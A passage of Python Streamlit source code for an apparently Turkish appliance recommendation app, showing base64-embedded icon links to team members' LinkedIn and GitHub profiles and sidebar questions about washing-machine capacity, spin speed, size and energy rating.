t2YWFvvny2vbqwy1PgNhM4Wsh2OV824xveoLNnXflOaEiPTqOo8RO/bPgexBvBdQaJBARc43Y3D8t9RvfvWRMF/cIKwUW+v263aHWaRiWk5Fz9+TCLi3n4veqNjyxdtdIAY+bsM+pWwm2fuvCUdHpvdOzjz3QQ8u23rdh78HLaKGMZhng7QRXAvDiaybceuztH2eB8OGmZ1beAMXDxGgo5U+KdhVcl4pKys9KrXpgythhJ4qBZzaUh342YWifjJS7L+habfx5R1XJU+t3/VTEdUHoCoo0gLcfvPTMcTlpyV0mf+vld9uqDzftDworiGQCjwdVpMEznl8wY1Rr971PKKvcNH95ttO+IaqXQVeG7ElgWSKZl5OeMsSBqN19sIGHQ3pvbG2vb2hpD11VelJi9PiQ7MySmqaWWyC1Z6cmPVbZ2JRx4HDrVaLcnHtlehXgqVnJiVfmZiTPc9Hqm1pnU2qobW5RHKMXoJrQixi5J6m5/c5fXnd+Z4XcbZxUmevQRIlToNBMBAPamTLPhzgwtJwkqwgkKLR9ZD7Bd0UVK8ZVHXUL8L+w0ILyyk5JEocBe4sKva1m0LhM0lJKX5cpk0KdxECpDSBb2LnH8giJ9z58zVlB3TvhOCmAW55c06c9OR7A2K916jCF6zuaCoXGPFBbR32SA9MRk/1OwABB09jRdOAlQKci5qWdYhUqzXyrwyYE0B1BLH0W5EQ4toEIDQsBxep86GimUCHyoXnTJjx8ssOfMAaOnXzj/FW5iNoKTHZvKG/jSHOt3f4S9ByJTmg1aPsABSWhPPA1wSxJIVtPCiIAxTIQiYCPBbAAsAxBNxLcGoRigqH0bpTQK8QQoEMElrQ55jw2Y+Kev3X4DwUQJsxcsHImIu6GvC9jzgR1BMQ5oTBT5AMoSyPwDIAa0c+GWx+RpGMXTBVOjKZUEV5oIE7v0INM++Q2lkQzoCSAmYLqg6BrwFYz3jn36qIg0X/o+ND3gbDC7PlvDUaSjrS3ea9Ei1yuZAc+I3S0eNmSLjKqPYi5Luw0BjmSWbFzoBHvkD7ewUGQbyOsIKgQoO99/12sd3joo0MifzZv2rmPdqfKT+xC3X/Y+WZw+HN07YoSEvbH7rNc+oIRaQT/GDNsrRR6qOFZ51AjTONCi2rO0EiOFVkCeSbRUSAepocXH6yW2u6fN2NyzYde+UdloRMt9NVFi5J6r7qs7f77oFkL3npJ1HAQy2j2A3r79MBU3vHuZQUdIhbR5jFqaRpJoRJiEoghnW7IlZ1g7btzZ0x4++Me/IP5H8mFui/eIYAl9DglZmvFo1dddPCLzy07zeLoYoOvdtrPCb0CaD3AfLlPoUUHIR8W+msJ+yQWN6JsW2jKP+nB/y4A3TedNX/psOIZ520L30M9BcWnk14Tyt6ZC1Ze0aiyP6UgP/ejsMrHBfSJLPBxN/lHzv+nB/B/jzziqZ3jZRgAAAAASUVORK5CYII=)](https://www.linkedin.com/in/sarperyilmaz/)") st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/sarperyilmaz)") with col7: st.markdown("<b><i>Doğukan Doğru</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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)](https://www.linkedin.com/in/do%C4%9Fukando%C4%9Fru/)") st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/dogudogru)") elif machine =="Çamaşır Makinesi": with st.sidebar: capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 0-6 KG , Orta Kapasite: 7-10 KG, Yüksek Kapasite: 10+ KG'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) cycle_options = [' ',"Düşük Devir","Orta Devir","Yüksek Devir"] cycle_help = '''Düşük devir: 1000'e kadar, Orta devir: 1000 - 1200, Yüksek Kapasite: 1200+'''.strip(",") cycle = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin devir sayısı ne olmalı?',options=cycle_options,help=cycle_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) soru_list = [capacity,cycle,size,energy_usage] soru_list1 = ["capacity","cycle","size","energy_usage"] soru_list2 = [capacity,cycle,size,energy_usage] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data3 = data2.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = 